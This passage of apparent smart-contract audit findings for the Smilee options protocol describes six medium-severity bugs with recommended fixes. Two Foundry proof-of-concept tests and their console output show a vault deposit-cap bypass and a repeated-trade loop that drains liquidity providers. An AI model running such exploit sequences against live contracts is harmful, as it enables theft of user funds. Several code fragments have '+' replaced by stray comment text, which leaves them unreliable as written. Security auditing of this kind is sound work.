assertGe(1, tokenId);\\n assertGe(1, pm.totalSupply());\\n }\\n```\\n\\nRun the test :\\n```\\nforge test --match-contract PositionManagerTest --match-test testMintAndBurnFail -vvv\\n```\\n","When storing user position data inside PositionManager, query IG's current price and use it instead.\\n```\\n 
function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId// Add the line below\\n// Add the line below\\n;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n// Add the line below\\n uint256 currentStrike = dvp.currentStrike();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n// Remove the line below\\n strike: params.strike,\\n// Add the line below\\n strike: currentStrike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp // Add the line below\\n params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium // Add the line below\\n= premium;\\n position.notionalUp // Add the line below\\n= params.notionalUp;\\n position.notionalDown // Add the line below\\n= params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp // Add the line below\\n position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp // Add the line below\\n params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\n","If the provided strike data does not match IG's current strike price, the user's minted position using `PositionManager` will be stuck and cannot be burned. 
This happens because when burn is called and `position.strike` is provided, it will revert as it cannot find the corresponding positions inside IG contract.\\nThis issue directly risking user's funds, consider a scenario where users mint a position near the end of the rolling epoch, providing the old epoch's current price. However, when the user's transaction is executed, the epoch is rolled and new epoch's current price is used, causing the mentioned issue to occur, and users' positions and funds will be stuck.","```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n 
params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n" +"Whenever swapPrice > oraclePrice, minting via PositionManager will revert, due to not enough funds being obtained from user.",medium,"In `PositionManager::mint()`, `obtainedPremium` is calculated in a different way to the actual premium needed, and this will lead to a revert, denying service to users.\\nIn `PositionManager::mint()`, the PM gets `obtainedPremium` from DVP::premium():\\n```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n\\nThen the actual premium used when minting by the DVP is obtained via the following code:\\n\\nFrom the code above, we can see that the actual premium uses the greater of the two price options. However, `DVP::premium()` only uses the oracle price to determine the `obtainedPremium`.\\nThis leads to the opportunity for `premiumSwap > premiumOrac`, so in the PositionManager, `obtainedPremium` is less than the actual premium required to mint the position in the DVP contract.\\nThus, when the DVP contract tries to collect the premium from the PositionManager, it will revert due to insufficient balance in the PositionManager:\\n```\\nIERC20Metadata(baseToken).safeTransferFrom(msg.sender, vault, premium_ + vaultFee);\\n```\\n","When calculating `obtainedPremium`, consider also using the premium from `swapPrice` if it is greater than the premium calculated from `oraclePrice`.","Whenever `swapPrice > oraclePrice`, minting positions via the PositionManager will revert. 
This is a denial of service to users and this disruption of core protocol functionality can last extended periods of time.","```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n" +Transferring ERC20 Vault tokens to another address and then withdrawing from the vault breaks `totalDeposit` accounting which is tied to deposit addresses,medium,"Vault inherits from the ERC20, so it has transfer functions to transfer vault shares. However, `totalDeposit` accounting is tied to addresses of users who deposited with the assumption that the same user will withdraw those shares. This means that any vault tokens transfer and then withdrawal from either user breaks the accounting of `totalDeposit`, allowing to either bypass the vault's max deposit limitation, or limit the vault from new deposits, by making it revert for exceeding the vault deposit limit even if the amount deposited is very small.\\n`Vault` inherits from ERC20:\\n```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n\\nwhich has public `transfer` and `transferFrom` functions to `transfer` tokens to the other users, which any user can call:\\n```\\n function transfer(address to, uint256 amount) public virtual override returns (bool) {\\n address owner = _msgSender();\\n _transfer(owner, to, amount);\\n return true;\\n }\\n```\\n\\nIn order to limit the deposits to vault limit, vault has `maxDeposit` parameter set by admin. 
It is used to limit the deposits above this amount, reverting deposit transactions if exceeded:\\n```\\n // Avoids underflows when the maxDeposit is setted below than the totalDeposit\\n if (_state.liquidity.totalDeposit > maxDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n\\n if (amount > maxDeposit - _state.liquidity.totalDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n```\\n\\nIn order to correctly calculate the current vault deposits (_state.liquidity.totalDeposit), the vault uses the following:\\nVault tracks cumulative deposit for each user (depositReceipt.cumulativeAmount)\\nWhen user deposits, cumulative deposit and vault's `totalDeposit` increase by the amount of asset deposited\\nWhen user initiates withdrawal, both user's cumulative amount and `totalDeposit` are reduced by the percentage of cumulative amount, which is equal to perecentage of shares being withdrawn vs all shares user has.\\nThis process is necessary, because the share price changes between deposit and withdrawal, so it tracks only actual deposits, not amounts earned or lost due to vault's profit and loss.\\nAs can easily be seen, this withdrawal process assumes that users can't transfer their vault shares, because otherwise the withdrawal from the user who never deposited but got shares will not reduce `totalDeposit`, and user who transferred the shares away and then withdraws all remaining shares will reduce `totalDeposit` by a large amount, while the amount withdrawn is actually much smaller.\\nHowever, since `Vault` is a normal `ERC20` token, users can freely transfer vault shares to each other, breaking this assumption. This leads to 2 scenarios:\\nIt's easily possible to bypass vault deposit cap: 1.1. Alice deposits up to max deposit cap (say, 1M USDC) 1.2. Alice transfers all shares except 1 wei to Bob 1.3. Alice withdraws 1 wei share. This reduces `totalDeposit` by full Alice deposited amount (1M USDC), but only 1 wei share is withdrawn, basically 0 assets withdrawn. 1.4. 
Alice deposits 1M USDC again (now the total deposited into the vault is 2M, already breaking the cap of 1M).\\nIt's easily possible to lock the vault from further deposits even though the vault might have small amount (or even 0) assets deposited. 2.1. Alice deposits up to max deposit cap (say, 1M USDC) 2.2. Alice transfers all shares except 1 wei to Bob 2.3. Bob withdraws all shares. Since Bob didn't deposit previously, this doesn't reduce `totalDeposit` at all, but withdraws all 1M USDC to Bob. At this point `totalDeposit` = 1M USDC, but vault has 0 assets in it and no further deposits are accepted due to `maxDeposit` limit.","Either disallow transferring of vault shares or track vault assets instead of deposits. Alternatively, re-design the withdrawal system (for example, throw out cumulative deposit calculation and simply calculate total assets and total shares and when withdrawing - reduce `totalDeposit` by the sharesWithdrawn / totalShares * totalDeposit)","Important security measure of vault max deposit limit can be bypassed, potentially losing funds for the users when the admin doesn't want to accept large amounts for various reasons (like testing something).\\nIt's possible to lock vault from deposits by inflating the `totalDeposit` without vault having actual assets, rendering the operations useless due to lack of liquidity and lack of ability to deposit. 
Even if `maxDeposit` is increased, `totalDeposit` can be inflated again, breaking protocol core functioning.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n 
AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testVaultDepositLimitBypass() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n (,,,,uint totalDeposit,,,,) = vault.vaultState();\\n console.log(""total deposits"", totalDeposit);\\n\\n vm.startPrank(alice);\\n 
vault.redeem(1e18);\\n vault.transfer(address(charlie), 1e18-1);\\n vault.initiateWithdraw(1);\\n vm.stopPrank();\\n\\n VaultUtils.logState(vault);\\n (,,,,totalDeposit,,,,) = vault.vaultState();\\n console.log(""total deposits"", totalDeposit);\\n\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 0\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 2000000000000000000\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 1\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 1000000000000000000\\n```\\n\\nNotice:\\nDemonstrates vault deposit limit bypass\\nVault has total assets of 2, but the total deposits is 1, allowing further deposits.","```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n" +PositionManager will revert when trying to return back to user excess of the premium transferred from the user when minting position,medium,"`PositionManager.mint` calculates preliminary premium to be paid for buying the option and transfers it from the user. The actual premium paid may differ, and if it's smaller, excess is returned back to user. 
However, it is returned using the safeTransferFrom:\\n```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n\\nThe problem is that `PositionManager` doesn't approve itself to transfer baseToken to `msg.sender`, and USDC `transferFrom` implementation requires approval even if address is transferring from its own address. Thus the transfer will revert and user will be unable to open position.\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n\\n```\\n function transferFrom(\\n address from,\\n address to,\\n uint256 value\\n )\\n external\\n override\\n whenNotPaused\\n notBlacklisted(msg.sender)\\n notBlacklisted(from)\\n notBlacklisted(to)\\n returns (bool)\\n {\\n require(\\n value <= allowed[from][msg.sender],\\n ""ERC20: transfer amount exceeds allowance""\\n );\\n _transfer(from, to, value);\\n allowed[from][msg.sender] = allowed[from][msg.sender].sub(value);\\n return true;\\n }\\n```\\n\\n`PositionManager` doesn't approve itself to do transfers anywhere, so `baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);` will always revert, preventing the user from opening position via `PositionManager`, breaking important protocol function.",Consider using `safeTransfer` instead of `safeTransferFrom` when transferring token from self.,"User is unable to open positions via `PositionManager` in certain situations as all such transactions will revert, breaking important protocol functionality and potentially losing user funds / profit due to failure to open position.","```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n 
}\\n```\\n" +"FeeManager `receiveFee` and `trackVaultFee` functions allow anyone to call it with user-provided dvp/vault address and add any arbitrary feeAmount to any address, breaking fees accounting and temporarily bricking DVP smart contract",medium,"`FeeManager` uses `trackVaultFee` function to account vault fees. The problem is that this function can be called by any smart contract implementing `vault()` function (there are no address or role authentication), thus malicious user can break all vault fees accounting by randomly inflating existing vault's fees, making it hard/impossible for admins to determine the real split of fees between vaults. Moreover, malicious user can provide such `feeAmount` to `trackVaultFee` function, which will increase any vault's fee to `uint256.max` value, meaning all following calls to `trackVaultFee` will revert due to fee addition overflow, temporarily bricking DVP smart contract, which calls `trackVaultFee` on all mints and burns, which will always revert until `FeeManager` smart contract is updated to a new address in `AddressProvider`.\\nSimilarly, `receiveFee` function is used to account fee amounts received by different addresses (dvp), which can later be withdrawn by admin via `withdrawFee` function. The problem is that any smart contract implementing `baseToken()` function can call it, thus any malicious user can break all accounting by adding arbitrary amounts to their addresses without actually paying anything. 
Once some addresses fees are inflated, it will be difficult for admins to track fee amounts which are real, and which are from fake dvps and fake tokens.\\n`FeeManager.trackVaultFee` function has no role/address check:\\n```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n\\nAny smart contract implementing `vault()` function can call it. The vault address returned can be any address, thus user can inflate vault fees both for existing real vaults, and for any addresses user chooses. This totally breaks all vault fees accounting.\\n`FeeManager.receiveFee` function has no role/address check either:\\n```\\n function receiveFee(uint256 feeAmount) external {\\n _getBaseTokenInfo(msg.sender).safeTransferFrom(msg.sender, address(this), feeAmount);\\n senders[msg.sender] += feeAmount;\\n\\n emit ReceiveFee(msg.sender, feeAmount);\\n }\\n// rest of code\\n function _getBaseTokenInfo(address sender) internal view returns (IERC20Metadata token) {\\n token = IERC20Metadata(IVaultParams(sender).baseToken());\\n }\\n```\\n\\nAny smart contract crafted by malicious user can call it. It just has to return base token, which can also be token created by the user. After transferring this fake base token, the `receiveFee` function will increase user's fee balance as if it was real token transferred.",Consider adding a whitelist of addresses which can call these functions.,"Malicious users can break all fee and vault fee accounting by inflating existing vaults or user addresses fees earned without actually paying these fees, making it hard/impossible for admins to determine the actual fees earned from each vault or dvp. 
Moreover, malicious user can temporarily brick DVP smart contract by inflating vault's accounted fees to `uint256.max`, thus making all DVP mints and burns (which call trackVaultFee) revert.","```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n" +Trading out of the money options has delta = 0 which breaks protocol assumptions of traders profit being fully hedged and can result in a loss of funds to LPs,medium,"Smilee protocol fully hedges all traders pnl by re-balancing the vault between base and side tokens after each trade. This is the assumption about this from the docs:\\nIn the other words, any profit for traders is taken from the hedge and not from the vault Liquidity Providers funds. LP payoff must be at least the underlying DEX (Uniswap) payoff without fees with the same settings.\\nHowever, out of the money options (IG Bull when `price < strike` or IG Bear when price > strike) have `delta = 0`, meaning that trading such options doesn't influence vault re-balancing. Since the price of these options changes depending on current asset price, any profit gained by traders from these trades is not hedged and thus becomes the loss of the vault LPs, breaking the assumption referenced above.\\nAs a result, LPs payout can become less than underlying DEX LPs payout without fees. And in extreme cases the vault funds might not be enough to cover traders payoff.
For example, this is the calculation of the IG Bull delta (s is the current asset price, `k` is the strike):\\n```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n\\nThis is example scenario to demonstrate the issue:\\nstrike = 1\\nvault has deposits = 2 (base = 1, side = 1), available liquidity: bull = 1, bear = 1\\ntrader buys 1 IG bear. This ensures that no vault re-balance happens when `price < strike`\\nprice drops to 0.9. Trader buys 1 IG bull (premium paid = 0.000038)\\nprice raises to 0.99. Trader sells 1 IG bull (premium received = 0.001138). Trader profit = 0.0011\\nprice is back to 1. Trader sells back 1 IG bear.\\nat this point the vault has (base = 0.9989, side = 1), meaning LPs have lost some funds when the price = strike.\\nWhile the damage from 1 trade is not large, if this is repeated several times, the damage to LP funds will keep inceasing.\\nThis can be especially dangerous if very long dated expiries are used, for example annual IG options. If the asset price remains below the strike for most of the time and IG Bear liquidity is close to 100% usage, then all IG Bull trades will be unhedged, thus breaking the core protocol assumption that traders profit should not translate to LPs loss: in such case traders profit will be the same loss for LPs. In extreme volatility, if price drops by 50% then recovers, traders can profit 3% of the vault with each trade, so after 33 trades the vault will be fully drained.","The issue seems to be from the approximation of the delta for OTM options. Statistically, long-term, the issue shouldn't be a problem as the long-term expectation is positive for the LPs profit due to it. 
However, short-term, the traders profit can create issues, and this seems to be the protocol's core assumption. Possible solution can include more precise delta calculation, maybe still approximation, but slightly more precise than the current approximation used.\\nAlternatively, keep track of underlying DEX equivalent of LP payoff at the current price and if, after the trade, vault's notional is less than that, add fee = the difference, to ensure that the assumption above is always true (similar to how underlying DEX slippage is added as a fee).","In some specific trading conditions (IG Bear liquidity used close to 100% if price < strike, or IG Bull liquidity used close to 100% if price > strike), all or most of the traders pnl is not hedged and thus becomes loss or profit of the LPs, breaking the core protocol assumptions about hedging and in extreme cases can drain significant percentage of the vault (LPs) funds, up to a point of not being able to payout traders payoff.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport 
{TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n 
ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), _strike);\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n // to ensure no rebalance from price movement\\n console.log(""Buy 100% IG BEAR @ 1.0"");\\n testBuyOption(1e18, 0, 1e18);\\n\\n for (uint i = 0; i < 20; i++) {\\n // price moves down, we buy\\n vm.warp(block.timestamp + 1 hours);\\n console.log(""Buy 100% IG BULL @ 0.9"");\\n testBuyOption(0.9e18, 1e18, 0);\\n\\n // price moves up, we sell\\n vm.warp(block.timestamp + 1 hours);\\n console.log(""Sell 100% IG BULL @ 0.99"");\\n testSellOption(0.99e18, 1e18, 0);\\n }\\n\\n // sell back original\\n console.log(""Sell 100% IG BEAR @ 1.0"");\\n testSellOption(1e18, 0, 1e18);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n 
vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(""base token notional"", btAmount);\\n console.log(""side token notional"", stAmount);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(""base token notional"", btAmount);\\n console.log(""side token notional"", stAmount);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n// rest of code\\n Buy 100% IG BEAR @ 1.0\\n premium 6140201098441368\\n base token notional 1006140201098441412\\n side token notional 999999999999999956\\n Buy 100% IG BULL @ 0.9\\n premium 3853262173300493\\n base token notional 1009993463271741905\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 4865770659690694\\n base token notional 1005127692612051211\\n side token notional 999999999999999956\\n// rest of code\\n Buy 
100% IG BULL @ 0.9\\n premium 1827837493502948\\n base token notional 984975976168184269\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 3172781130161218\\n base token notional 981803195038023051\\n side token notional 999999999999999956\\n Sell 100% IG BEAR @ 1.0\\n payoff received 3269654020920760\\n base token notional 978533541017102291\\n side token notional 999999999999999956\\n```\\n\\nNotice:\\nInitial vault balance at the asset price of 1.0 is base = 1, side = 1\\nAll IG Bull trades do not change vault side token balance (no re-balancing happens)\\nAfter 20 trades, at the asset price of 1.0, base = 0.9785, side = 1\\nThis means that 20 profitable trades create a 1.07% loss for the vault. Similar scenario for annual options with 50% price move shows 3% vault loss per trade.","```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n" +"If the vault's side 